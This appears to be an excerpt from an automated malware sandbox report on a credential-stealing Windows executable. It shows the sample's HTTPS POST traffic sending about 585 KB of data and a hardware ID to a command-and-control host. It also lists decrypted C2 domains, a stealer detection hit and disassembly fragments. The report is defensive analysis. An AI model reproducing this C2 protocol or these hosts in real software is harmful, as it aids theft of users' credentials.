2025-03-05 08:14:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:16 UTC	373	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6Q3E6TYJE8RBGJQCSH Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2515 Host: explorebieology.run
2025-03-05 08:14:16 UTC	2515	OUT	Data Raw: 2d 2d 36 51 33 45 36 54 59 4a 45 38 52 42 47 4a 51 43 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 36 51 33 45 36 54 59 4a 45 38 52 42 47 4a 51 43 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 36 51 33 45 36 54 59 4a 45 38 52 42 47 4a 51 43 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 51 33 45 36 54 59 4a 45 38 Data Ascii: --6Q3E6TYJE8RBGJQCSHContent-Disposition: form-data; name="act"send_message--6Q3E6TYJE8RBGJQCSHContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--6Q3E6TYJE8RBGJQCSHContent-Disposition: form-data; name="pid"1--6Q3E6TYJE8
2025-03-05 08:14:16 UTC	815	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82re%2F6FQmEJPr8ZfnfQa0nAM2qLaUiZJl3StM%2F1G3BWuW2V1RFMaWQ5bQcjwjtATLoXJqxMTjpCzi6wSCc9FeTQgv%2BjggLttAc26WrtS9vQswFh3mY%2BURMHRW1jT1T1JGuYitaZX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b828a79ae6847d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=2034&rtt_var=777&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=3524&delivery_rate=1435594&cwnd=120&unsent_bytes=0&cid=08811038abcbbafa&ts=527&x=0"
2025-03-05 08:14:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:14:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:17 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2KZFCL2DX9GXP Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584934 Host: explorebieology.run
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 0d 0a 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4b 5a 46 43 4c 32 44 58 39 47 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --2KZFCL2DX9GXPContent-Disposition: form-data; name="act"send_message--2KZFCL2DX9GXPContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--2KZFCL2DX9GXPContent-Disposition: form-data; name="pid"1--2KZFCL2DX9GXPContent-Di
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 35 a5 2c b0 d3 Data Ascii: bP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u5,
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 fb 4e 5d 03 66 Data Ascii: 'T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJGN]f
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 53 10 21 f7 69 Data Ascii: _wN0 E0VGo$?zRf@9#w_56~s9UKBd_QgJd\/~#}'[lxmUVw_?U-]%B6RY"N<Leo7"pNBNry<A9@O]>PeS!i
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 78 18 10 2f 10 Data Ascii: 0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:x/
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 63 75 90 ec 6f 99 67 7d db 6d f7 09 5d 00 96 92 2d 3a 0a dc d8 96 d2 0f 42 8f ac 9b 74 c9 bf 4a c9 de b9 29 2c 3e 15 58 bc 85 df da 9f 3c 6c b2 3f e3 3a b1 b4 5e 5f 62 1c 9a 1b ba c7 f4 5b 70 96 0a d2 72 6c a9 d1 73 c3 09 9e ad 42 11 dc e5 b3 0d c3 91 31 e4 7a da 68 26 a9 da 4e d9 7d bc 57 a9 20 2d 5f 68 9a 8a 36 9e e0 f9 5e e8 c5 df 1b e9 ae a2 91 b5 47 4e 05 a7 00 90 92 28 23 71 75 ee 65 01 be cf 27 c3 c9 7c 82 ef 88 46 93 87 d7 d6 01 81 a4 f8 fd b9 1a 5c 1e cd 04 48 d7 0d 14 1d 1e 56 04 19 f3 17 d6 eb 99 87 6d 5c a3 0c f0 ac c9 0f f9 1f 2b 3b a1 9b c9 c1 7c e8 61 76 e8 af b8 58 32 9d 84 5f c8 41 42 0d 5c 7d 6a 78 fc 26 a7 7b 62 8a a9 7c 50 a9 cd 1a 8e 06 d3 32 d5 df 98 c5 2d 01 13 2d b6 88 c1 bd 88 07 55 79 ee 14 ca dc f0 e9 ca e9 ea 21 e5 17 27 f6 94 Data Ascii: cuog}m]-:BtJ),>X<l?:^_b[prlsB1zh&N}W -_h6^GN(#que'\|F\HVm\+;\|avX2_AB\}jx&{b\|P2--Uy!'
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 3f a3 07 d1 a5 2d b3 ce 5e fe 68 f3 24 cb 2e 4f b1 64 b9 59 e7 71 df dd 2a bd 92 d9 ce be 7f 6c ef 96 7c ad fd f7 c5 9d d2 03 25 8b 13 27 f6 92 b8 3d 2d ff 54 71 ff 0c ed 23 6d 2c a6 b4 e0 17 5e c8 81 ee 14 be 01 1a 0c 0b f2 e9 57 6d 5e 13 02 29 4c b0 f0 65 ec f7 61 90 85 81 d7 8f 66 a8 13 4c 00 29 0b c2 a0 50 22 60 4d 04 ca 7e d5 af f4 eb 0c 1a 29 a5 e0 af 2d c3 f7 d6 38 c0 7f f1 92 c8 91 83 a4 cc cd 4b 7d 69 1f 54 bf ef 16 34 c0 86 c0 f0 e3 46 9b a5 ae ae ca 3f f3 57 84 5e 06 b3 75 b2 0d df 47 b2 3c 3c 36 5c 9e 3d 84 28 e9 ee 8c c3 60 c6 cc 63 07 10 e4 c7 37 8b 6e 37 47 44 86 d7 73 84 9a 6f 1f 16 55 23 22 4b 6c df f1 c5 bf 2f ba 11 5b ff 85 57 a4 a0 ce 5d b0 14 74 a7 04 f8 e3 e0 c3 38 e2 db 3d 44 3e d4 9f c9 b4 2c 7e f3 d1 2a 6f 1e c6 c9 37 63 69 7c e0 Data Ascii: ?-^h$.OdYql\|%'=-Tq#m,^Wm^)LeafL)P"`M~)-8K}iT4F?W^uG<<6\=(`c7n7GDsoU#"Kl/[W]t8=D>,~o7ci\|
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: e4 fe f2 ac a5 21 d2 73 5a 32 06 4e d1 de 83 f3 b6 64 1b a1 e9 c5 f3 ee eb 97 03 5a 70 13 43 d3 ac 66 d7 80 f9 75 2d 48 aa 62 1e 6d fd bb 45 7f 2a 65 1f 08 93 6e 0d 2d 79 d6 e5 ec f2 b2 42 ff c5 62 a5 5e be f5 dc 8b 8a d5 26 a1 52 9f e2 ad 32 35 6a cb e0 a3 80 a2 a5 36 a5 a8 94 d0 96 70 ce 4c b1 6b e7 af 39 d9 da 27 35 5d c8 0c ef f2 ff bd d4 52 92 73 eb 33 a9 e1 a0 03 94 18 78 cc 7d 07 78 a8 e9 ce 07 ae 0e d4 36 a7 2f b5 ac e7 c7 8d 9d 33 9a 6c 39 e4 1a a0 d1 59 71 48 25 48 6f 9e d4 5d dd 36 f1 b0 ca 0c 84 82 80 c1 5d 7e 9f 59 83 d0 79 ae 62 84 2f 7c 0d dc 80 ff 2d db 32 e2 e4 6b 4f 2b 6d e8 c1 bf ca 0e 79 b5 97 d9 b0 2b 17 67 58 26 4b 1e d6 8f 69 43 eb 1e 8b ff cc ab 61 c1 6f 59 39 73 45 0d 01 bc 15 0f 80 78 5b 1c 3a d7 07 17 2a 08 f1 1c de ca 3a e7 87 Data Ascii: !sZ2NdZpCfu-HbmEen-yBb^&R25j6pLk9'5]Rs3x}x6/3l9YqH%Ho]6]~Yyb/\|-2kO+my+gX&KiCaoY9sEx[::
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 2a 26 c4 02 9d ba 56 98 88 85 f9 0f c5 81 59 6d 8d 6f 09 7f 58 b0 e5 21 2b 92 05 ae 9f 7c 58 6a e9 08 bf 56 ae 4a 1e ca 88 52 6a 15 f3 68 db 46 44 a3 39 cd c5 9a 4a ce 76 73 de c7 0f d6 90 e5 98 af 55 ac 8c 9f 34 ac ef 3f 90 d4 f8 6a 77 de 4e f4 74 98 33 2e bc 5d f3 0f b4 4b 34 fb b8 f3 e3 0c 41 ea f6 a4 47 ee 7f 30 57 52 53 95 64 fe ac 5e 90 4c 12 a3 37 ac 37 07 e5 c5 a1 cd 31 b6 b7 8c f6 f4 9b b7 d7 6c 84 03 14 66 d7 ba db 0c 15 a6 77 d1 0c e5 75 c7 88 a6 d8 88 62 bc 98 f0 0b 79 58 90 db 02 b5 6b e6 59 41 4a 5d 61 c9 2b d2 4f 9c 74 de a9 b3 b7 11 6a ff 38 df 59 d8 b5 7a ab 9f 28 84 f5 8f 4b c5 7a 00 4a 0a d3 21 a2 2e 4e 2b 1e 4b 91 45 b7 b6 3a 6f 70 41 40 e9 9b f9 ea 3d e8 77 8f 20 b3 da 8c dd bc 13 77 9d 4d f6 77 67 c5 1a ab 4b 6e d3 c3 4e 5d 2e e6 a1 Data Ascii: *&VYmoX!+\|XjVJRjhFD9JvsU4?jwNt3.]K4AG0WRSd^L771lfwubyXkYAJ]a+Otj8Yz(KzJ!.N+KE:opA@=w wMwgKnN].
2025-03-05 08:14:17 UTC	15331	OUT	Data Raw: 25 2f 1f b8 2d b6 43 e6 b7 b6 7c 38 9a 21 95 70 3f 92 a3 98 5e 81 b9 0a 07 45 99 69 2e 46 9b 10 f5 e7 34 7b d6 bc d0 c2 52 c9 91 8a 82 28 45 3d ba ce f8 62 ca b4 27 33 79 f1 e1 16 ee d5 0d f0 37 05 eb 51 2a 24 ca ae e1 bd 21 c6 6b 64 fe 79 fc 92 5d 89 87 a3 03 75 fb 4a 62 db 73 08 9e 7c 85 9a d2 46 28 52 7f f2 8d 17 a3 1d 3a 06 ef d5 99 ed ba c6 4b 32 e5 1a ca bf 39 ad 7b a5 50 3a 67 2d f6 9b 2b 1b 13 e2 b7 60 17 ed 3c d8 b4 c6 15 db 44 49 5a a9 d9 4b af 95 8e e0 f0 82 b6 a4 39 27 f1 4c d9 ee 4a 69 15 81 2d d5 8a ab 50 cf 29 51 87 e3 1e 2b c7 0e c2 3b 55 48 6d 7a e4 78 0d e3 6c 74 eb cb 5f 71 3e 4e 87 60 01 dc 9b 5c 14 c0 67 da 14 47 6f 9d 8e e0 eb 30 8a 83 a7 9e 64 19 76 a1 87 07 74 4f 52 9b a0 a6 87 a2 4e df fc e2 1b 1d 89 f2 05 9d e4 1d 6b ea 4b c1 78 Data Ascii: %/-C\|8!p?^Ei.F4{R(E=b'3y7Q*$!kdy]uJbs\|F(R:K29{P:g-+`<DIZK9'LJi-P)Q+;UHmzxlt_q>N`\gGo0dvtORNkKx
2025-03-05 08:14:19 UTC	822	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PtYmYyrIEvpQx1Gj1tOzxB1w1dOxD3GKPjRi2gdeM870V4%2BbYYzruhfkStw20Y6PGag8d%2F1V4%2BGWrCMPJ1s6pVDJkoN%2BA3yMAOf8OzeigTcEo3YoFIX5FitplMx8Qc6lL1rD6Sa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b828b12ebe424c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1561&rtt_var=594&sent=203&recv=603&lost=0&retrans=0&sent_bytes=2849&recv_bytes=587612&delivery_rate=1830721&cwnd=203&unsent_bytes=0&cid=ec8610721d1aaa58&ts=1614&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49740	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:19 UTC	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: explorebieology.run
2025-03-05 08:14:19 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 26 6a 3d 26 68 77 69 64 3d 41 45 32 35 37 33 44 33 32 38 32 38 39 41 32 44 46 32 42 31 30 35 30 39 41 46 30 44 46 46 41 41 Data Ascii: act=get_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=&hwid=AE2573D328289A2DF2B10509AF0DFFAA
2025-03-05 08:14:20 UTC	814	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:14:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvP47wG639unLNN19HVS4BvCffDT4UwM4BLcv5lbtTYXOWmM%2BHu%2B1yWl4HDq1MD6nDQ5b3mn8bFRWeGgbxv2R0AZzUVqXKnDqv%2F4bzaiLgRZ9%2BZ2Z8tnpNcuevwWic5u2hiC34Au"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b828be8c847b0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2023&rtt_var=760&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1081&delivery_rate=1443400&cwnd=67&unsent_bytes=0&cid=46b57c8bd4798dae&ts=445&x=0"
2025-03-05 08:14:20 UTC	54	IN	Data Raw: 33 30 0d 0a 43 58 6a 78 32 4e 43 6e 56 2f 6d 59 71 4b 55 67 2b 58 77 35 63 55 4b 41 47 47 69 61 51 4f 4f 76 73 30 45 77 61 49 54 49 4b 71 46 53 4a 51 3d 3d 0d 0a Data Ascii: 30CXjx2NCnV/mYqKUg+Xw5cUKAGGiaQOOvs0EwaITIKqFSJQ==
2025-03-05 08:14:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:14:06
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\JqGBbm7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\JqGBbm7.exe"
Imagebase:	0x9c0000
File size:	2'996'224 bytes
MD5 hash:	30C1A6337089E68B975438CAEBC8F497
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: gadgethgfub.icu
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: explorebieology.run
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: moderzysics.top
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: techmindzs.live
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: codxefusion.top
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: phygcsforum.life
Source: 00000000.00000002.1806831193.00000000009C1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: techspherxe.top

Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h	0_2_00A0A030
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h	0_2_00A0C1C6
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h	0_2_00A06170
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	0_2_00A0E420
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	0_2_00A0E550
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov ebp, edx	0_2_00A0E550
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_009D284C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_009D284C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]	0_2_009D284C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]	0_2_009F8C5C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh]	0_2_009D3183
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-62h]	0_2_009F12E0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh]	0_2_00A0F630
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00A0F630
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	0_2_00A0F870
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00A0F870
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h]	0_2_009CFAE9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	0_2_00A0FBA0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_009F7B25
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F7B25
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov esi, eax	0_2_009DBFAA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00A08032
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx eax, byte ptr [edx+esi-444800C2h]	0_2_009F0042
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_009F81B4
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F81B4
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_009EA2B0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009CA220
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009CA220
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then push 00000000h	0_2_009F039F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx]	0_2_009F43D0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_009E6370
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h	0_2_00A0A580
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then jmp ecx	0_2_009F46F0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_009F46F0
